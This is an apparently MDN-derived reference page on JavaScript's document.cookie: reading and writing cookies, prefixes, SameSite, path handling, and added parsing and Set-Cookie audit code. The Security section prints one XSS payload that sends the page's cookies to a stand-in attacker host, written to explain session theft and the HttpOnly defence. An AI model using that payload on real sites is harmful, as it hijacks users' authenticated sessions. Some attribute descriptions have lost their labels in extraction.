Document.cookie
This article describes getting and setting the cookies associated with the current document. For a general library for working with cookies, see the simple cookie framework.
Syntax
Reading all cookies associated with the current document
allCookies = document.cookie;
In the code above allCookies is a string containing a semicolon-separated list of all cookies (i.e. key=value pairs). Note that each key and value may be surrounded by whitespace (space and tab characters): in fact RFC 6265 mandates a single space after each semicolon, but some user agents may not abide by this.
Writing a new cookie
document.cookie = newCookie;
In the code above, newCookie is a string of the form key=value. Note that you can set/update only a single key=value pair at a time using this method. Also note that:
- Any of the following cookie attribute values can optionally follow the key-value pair, specifying the cookie to set/update, and preceded by a semi-colon separator:
- See Date.toUTCString() for help formatting this value.
- The strict value will prevent the cookie from being sent by the browser to the target site in all cross-site browsing context, even when following a regular link.
- The lax value will only send cookies for TOP LEVEL navigation GET requests. This is sufficient for user tracking, but it will prevent many CSRF attacks.
- __Secure- Signals to the browser that it should only include the cookie in requests transmitted over a secure channel.
- __Host- Signals to the browser that in addition to the restriction to only use the cookie from a secure origin, the scope of the cookie is limited to a path attribute passed down by the server. If the server omits the path attribute the "directory" of the request URI is used. It also signals that the domain attribute must not be present, which prevents the cookie from being sent to other domains. For Chrome the path attribute must always be the origin.
- ;path=path (e.g., '/', '/mydir') If not specified, defaults to the current path of the current document location.
Note: Prior to Gecko 6.0, paths with quotes were treated as if the quotes were part of the string, instead of as if they were delimiters surrounding the actual path string. This has been fixed.
Warning: When user privacy is a concern, it is important that any web app implementation invalidates cookie data after a certain timeout and does not rely on the browser clearing session cookies. One of the most beloved features of Firefox prevents session cookies from ever expiring. The same issue also occurs with Google Chrome (and probably with other browsers offering similar features).
Note: The dash is considered part of the prefix.
Note: These flags are only settable with the secure attribute.
Note: As you can see from the code above, document.cookie is an accessor property with native setter and getter functions, and consequently is not a data property with a value: what you write is not the same as what you read, everything is always mediated by the JavaScript interpreter.
Examples
Example #1: Simple usage

    document.cookie = "name=oeschger";
    document.cookie = "favorite_food=tripe";

    function alertCookie() {
      alert(document.cookie);
    }

    <button onclick="alertCookie()">Show cookies</button>

Example #2: Get a sample cookie named test2

    document.cookie = "test1=Hello";
    document.cookie = "test2=World";

    // Extract the value of test2 from the cookie string
    var cookieValue = document.cookie.replace(/(?:(?:^|.*;\s*)test2\s*\=\s*([^;]*).*$)|^.*$/, "$1");

    function alertCookieValue() {
      alert(cookieValue);
    }

    <button onclick="alertCookieValue()">Show cookie value</button>

Example #3: Do something only once
To use the following code, replace all occurrences of doSomethingOnlyOnce (the name of the cookie) with a custom name.

    function doOnce() {
      // Run the action only if the marker cookie is not already set to "true"
      if (document.cookie.replace(/(?:(?:^|.*;\s*)doSomethingOnlyOnce\s*\=\s*([^;]*).*$)|^.*$/, "$1") !== "true") {
        alert("Do something here!");
        document.cookie = "doSomethingOnlyOnce=true; expires=Fri, 31 Dec 9999 23:59:59 GMT";
      }
    }

    <button onclick="doOnce()">Only do something once</button>

Example #4: Reset the previous cookie

    function resetOnce() {
      // An expiry date in the past removes the cookie
      document.cookie = "doSomethingOnlyOnce=; expires=Thu, 01 Jan 1970 00:00:00 GMT";
    }

    <button onclick="resetOnce()">Reset only once cookie</button>

Example #5: Check whether a cookie exists

    // ES5
    if (document.cookie.split(';').filter(function(item) {
      return item.trim().indexOf('reader=') == 0
    }).length) {
      console.log('The cookie "reader" exists (ES5)')
    }

    // ES2016
    if (document.cookie.split(';').filter((item) => item.trim().startsWith('reader=')).length) {
      console.log('The cookie "reader" exists (ES2016)')
    }

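Example #6: Check that a cookie has a specific value

    // Both variants use a substring match, so they are also true
    // for cookies such as reader=10 or otherreader=1.

    // ES5
    if (document.cookie.split(';').filter(function(item) {
      return item.indexOf('reader=1') >= 0
    }).length) {
      console.log('The cookie "reader" has "1" for value')
    }

    // ES2016
    if (document.cookie.split(';').filter((item) => item.includes('reader=1')).length) {
      console.log('The cookie "reader" has "1" for value')
    }
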
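The following is an added example, not code from the original page: it parses the document.cookie string into a Map so that existence and value checks compare whole names and values instead of substrings. The function names are hypothetical and the sample string is constructed; the cookie string is passed as a parameter so the code also runs outside a browser.

```javascript
// Added example, not from the original page; all function names are hypothetical.
// Parses a document.cookie-style string ("k1=v1; k2=v2") into a Map.
function parseCookies(cookieString) {
  const jar = new Map();
  for (const part of cookieString.split(";")) {
    const pair = part.trim(); // whitespace around pairs varies between user agents
    if (pair === "") continue;
    const eq = pair.indexOf("="); // split on the first "=" only: values may contain "="
    const name = eq === -1 ? "" : pair.slice(0, eq).trim();
    const raw = eq === -1 ? pair : pair.slice(eq + 1).trim();
    let value;
    try {
      value = decodeURIComponent(raw);
    } catch (e) {
      value = raw; // malformed percent-escape: keep the raw text instead of throwing
    }
    // Keep the first occurrence of a duplicated name.
    if (!jar.has(name)) jar.set(name, value);
  }
  return jar;
}

function hasCookie(cookieString, name) {
  return parseCookies(cookieString).has(name);
}

function cookieEquals(cookieString, name, expected) {
  return parseCookies(cookieString).get(name) === expected;
}

// The substring test from Example #6, kept for comparison.
function substringCheck(cookieString, needle) {
  return cookieString.split(";").filter((item) => item.includes(needle)).length > 0;
}

// Constructed sample input; in a browser, pass document.cookie instead.
const sampleCookies = "reader=10; otherreader=1;  token=a=b%3D ;theme=dark";
console.log(substringCheck(sampleCookies, "reader=1"));   // true: false positive
console.log(cookieEquals(sampleCookies, "reader", "1"));  // false: exact comparison
console.log(parseCookies(sampleCookies).get("token"));    // "a=b="
```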
Security
It is important to note that the path attribute does not protect against unauthorized reading of the cookie from a different path. It can be easily bypassed using the DOM, for example by creating a hidden iframe element with the path of the cookie, then accessing this iframe's contentDocument.cookie property. The only way to protect the cookie is by using a different domain or subdomain, due to the same origin policy.
Cookies are often used in web applications to identify a user and their authenticated session, so stealing a cookie from a web application will lead to hijacking the authenticated user's session. Common ways to steal cookies include social engineering or exploiting an XSS vulnerability in the application:

    (new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;

The HttpOnly cookie attribute can help to mitigate this attack by preventing access to the cookie value through JavaScript. Read more about Cookies and Security.
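The following is an added example, not code from the original page: a check that a defender could run over Set-Cookie header values to flag cookies missing HttpOnly, Secure or a strict/lax SameSite value, and cookies that break the __Secure- and __Host- prefix rules described above. The function name, the finding codes and the header values are constructed for illustration.

```javascript
// Added example, not from the original page; auditSetCookie is a hypothetical name.
// Returns short finding codes for one Set-Cookie header value.
function auditSetCookie(headerValue) {
  const [pair, ...attrParts] = headerValue.split(";").map((s) => s.trim());
  const eqPos = pair.indexOf("=");
  const name = eqPos === -1 ? "" : pair.slice(0, eqPos);
  const attrs = new Map(); // attribute names are case-insensitive
  for (const part of attrParts) {
    if (part === "") continue;
    const eq = part.indexOf("=");
    const key = (eq === -1 ? part : part.slice(0, eq)).trim().toLowerCase();
    attrs.set(key, eq === -1 ? "" : part.slice(eq + 1).trim());
  }
  const findings = [];
  // Without HttpOnly the value is readable through document.cookie.
  if (!attrs.has("httponly")) findings.push("missing-httponly");
  if (!attrs.has("secure")) findings.push("missing-secure");
  const sameSite = (attrs.get("samesite") || "").toLowerCase();
  if (sameSite !== "strict" && sameSite !== "lax") findings.push("samesite-not-strict-or-lax");
  const lowerName = name.toLowerCase();
  // Prefix rules: both prefixes need Secure; __Host- also forbids Domain and needs Path=/.
  if (lowerName.startsWith("__secure-") && !attrs.has("secure")) findings.push("secure-prefix-without-secure");
  if (lowerName.startsWith("__host-")) {
    if (!attrs.has("secure")) findings.push("host-prefix-without-secure");
    if (attrs.has("domain")) findings.push("host-prefix-has-domain");
    if (attrs.get("path") !== "/") findings.push("host-prefix-path-not-root");
  }
  return { name, findings };
}

// Constructed header values for illustration.
const sampleHeaders = [
  "sid=abc123; Path=/",
  "__Host-sid=abc123; Secure; HttpOnly; SameSite=Lax; Path=/",
  "__Host-sid=abc123; Secure; HttpOnly; SameSite=Strict; Domain=example.org; Path=/app",
  "__Secure-id=1; HttpOnly; SameSite=Lax",
];
for (const header of sampleHeaders) {
  const { name, findings } = auditSetCookie(header);
  console.log(name, findings.length ? findings.join(", ") : "ok");
}
```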
Notes
- Starting with Firefox 2, a better mechanism for client-side storage is available: WHATWG DOM Storage.
- You can delete a cookie by simply updating its expiration time to zero.
- Keep in mind that the more cookies you have, the more data will be transferred between the server and the client for each request. This will make each request slower. It is highly recommended that you use WHATWG DOM Storage if you are going to keep "client-only" data.
- RFC 2965 (Section 5.3, "Implementation Limits") specifies that there should be no maximum length of a cookie's key or value size, and encourages implementations to support arbitrarily large cookies. Each browser's implementation maximum will necessarily be different, so consult individual browser documentation.
The syntax of the document.cookie accessor property is due to the client-server nature of cookies, which differs from other client-client storage methods (like, for instance, localStorage):
The server tells the client to store a cookie:

    HTTP/1.0 200 OK
    Content-type: text/html
    Set-Cookie: cookie_name1=cookie_value1
    Set-Cookie: cookie_name2=cookie_value2; expires=Sun, 16 Jul 3567 06:23:41 GMT

    [content of the page here]

The client sends back to the server its cookies previously stored:

    GET /sample_page.html HTTP/1.1
    Host: www.example.org
    Cookie: cookie_name1=cookie_value1; cookie_name2=cookie_value2
    Accept: */*

Using relative URLs in the path parameter
The path parameter of a new cookie can accept only absolute paths. If you want to use relative paths, therefore, you need to convert them. The following function can translate relative paths to absolute paths. It is a general-purpose function, but can of course also be used successfully for the path parameter of a new cookie.
Library

    /*\
    |*|
    |*|  :: Translate relative paths to absolute paths ::
    |*|
    |*|  https://developer.mozilla.org/ru/docs/Web/API/document.cookie
    |*|  https://developer.mozilla.org/User:fusionchess
    |*|
    |*|  The following code is released under the GNU Public License, version 3 or later.
    |*|  http://www.gnu.org/licenses/gpl-3.0-standalone.html
    |*|
    \*/

    function relPathToAbs (sRelPath) {
      // Replace the last segment of the current path with the relative path, collapsing "./" and repeated slashes
      var nUpLn, sDir = "", sPath = location.pathname.replace(/[^\/]*$/, sRelPath.replace(/(\/|^)(?:\.?\/+)+/g, "$1"));
      // Resolve each run of "/../" by dropping the matching number of trailing directories
      for (var nEnd, nStart = 0; nEnd = sPath.indexOf("/../", nStart), nEnd > -1; nStart = nEnd + nUpLn) {
        nUpLn = /^\/(?:\.\.\/)*/.exec(sPath.slice(nEnd))[0].length;
        sDir = (sDir + sPath.substring(nStart, nEnd)).replace(new RegExp("(?:\\\/+[^\\\/]*){0," + ((nUpLn - 1) / 3) + "}$"), "/");
      }
      return sDir + sPath.substr(nStart);
    }

Sample usage

    /* Let us be in /ru/docs/Web/API/document.cookie */

    alert(location.pathname);
    // displays: /ru/docs/Web/API/document.cookie

    alert(relPathToAbs("./"));
    // displays: /ru/docs/Web/API/

    alert(relPathToAbs("../Guide/API/DOM/Storage"));
    // displays: /ru/docs/Web/Guide/API/DOM/Storage

    alert(relPathToAbs("../../Firefox"));
    // displays: /ru/docs/Firefox

    alert(relPathToAbs("../Guide/././API/../../../Firefox"));
    // displays: /ru/docs/Firefox

Relative cookie expiration: numeric examples
If you don't want to use an absolute date for the end parameter, here you can find some numeric examples of expiration dates relative to the moment of storage of the cookie:

    docCookies.setItem("mycookie1", "myvalue1", 864e2, "/");   // this cookie will expire in one DAY
    docCookies.setItem("mycookie2", "myvalue2", 6048e2, "/");  // this cookie will expire in one WEEK
    docCookies.setItem("mycookie3", "myvalue3", 2592e3, "/");  // this cookie will expire in one MONTH (30 days)
    docCookies.setItem("mycookie4", "myvalue4", 31536e3, "/"); // this cookie will expire in one YEAR

Other examples
Example #5: Do something only once – a general library
Library

    function executeOnce () {
      var argc = arguments.length, bImplGlob = typeof arguments[argc - 1] === "string";
      if (bImplGlob) { argc++; }
      if (argc < 3) { throw new TypeError("executeOnce - not enough arguments"); }
      var fExec = arguments[0], sKey = arguments[argc - 2];
      if (typeof fExec !== "function") { throw new TypeError("executeOnce - first argument must be a function"); }
      // Reject identifiers that collide with cookie attribute names
      if (!sKey || /^(?:expires|max\-age|path|domain|secure)$/i.test(sKey)) { throw new TypeError("executeOnce - invalid identifier"); }
      // The marker cookie is already set: do nothing
      if (decodeURIComponent(document.cookie.replace(new RegExp("(?:(?:^|.*;)\\s*" + encodeURIComponent(sKey).replace(/[\-\.\+\*]/g, "\\$&") + "\\s*\\=\\s*([^;]*).*$)|^.*$"), "$1")) === "1") { return false; }
      fExec.apply(argc > 3 ? arguments[1] : null, argc > 4 ? Array.prototype.slice.call(arguments, 2, argc - 2) : []);
      document.cookie = encodeURIComponent(sKey) + "=1; expires=Fri, 31 Dec 9999 23:59:59 GMT" + (bImplGlob || !arguments[argc - 1] ? "; path=/" : "");
      return true;
    }

Syntax
executeOnce(callback[, thisObject[, argumentToPass1[, argumentToPass2[, …[, argumentToPassN]]]]], identifier[, onlyHere])
Description
Executes a function only once, even after the refresh of the page.
Parameters
callback
    The function to be executed (function).
argumentToPass1, argumentToPass2, argumentToPassN Optional
    The arguments of the callback function.
identifier
    The identifier to check, i.e. the name of the cookie (string).
onlyHere Optional
    A boolean expressing whether the cookie will use the local path (true) instead of the global one (false or undefined) (boolean or undefined).
Usage examples

    function alertSomething (sMsg) {
      alert(sMsg);
    }

    executeOnce(alertSomething, null, "Hello world. ", "alert_something");

This page was last modified on Jul 17, 2023 by MDN contributors.
Portions of this content are ©1998–2023 by individual mozilla.org contributors. Content available under a Creative Commons license.